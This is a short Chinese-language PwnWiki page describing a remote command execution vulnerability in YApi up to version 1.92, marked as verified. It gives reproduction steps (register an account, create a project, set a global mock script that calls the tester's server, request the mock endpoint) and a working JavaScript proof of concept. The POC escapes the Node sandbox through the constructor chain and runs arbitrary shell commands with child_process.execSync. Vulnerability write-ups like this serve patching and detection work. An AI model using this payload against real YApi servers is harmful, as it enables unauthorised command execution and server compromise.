YApi 未授权用户创建&Mock远程命令执行漏洞

From PwnWiki
Revision as of 20:26, 8 July 2021 by Pwnwiki (talk | contribs) (Created page with "==漏洞复现==")
(diff) ← Older revision | Latest revision (diff) | Newer revision → (diff)
Other languages:
Chinese • ‎中文(中国大陆)‎ • ‎中文(繁體)‎
Check.png 该漏洞已通过验证

本页面的EXP/POC/Payload经测试可用,漏洞已经成功复现。

影响版本

<=V1.92 All

漏洞复现

登录注册后,创建一个项目

124460388-eaa46100-ddc1-11eb-80c4-2bddb97df8e1.png

然后选择设置全局的mock脚本,设置命令为远程访问我的服务器地址。

124460511-090a5c80-ddc2-11eb-92f6-46c9b3b498bb.png

添加接口,访问接口的mock地址

124460629-2dfecf80-ddc2-11eb-98c3-b96f7174d8f1.png

服务器可以看到如下响应 124460757-5686c980-ddc2-11eb-87df-09e0f9ac08af.png


POC

const sandbox = this
const ObjectConstructor = this.constructor
const FunctionConstructor = ObjectConstructor.constructor
const myfun = FunctionConstructor('return process')
const process = myfun()
mockjson = process.mainModule.require("child_process").execSync("command").toString()

参考

https://github.com/YMFE/yapi/issues/2233

Retrieved from "https://pwnwiki.com/index.php?title=YApi_未授權用戶創建%26Mock遠程命令執行漏洞/zh-cn&oldid=6554"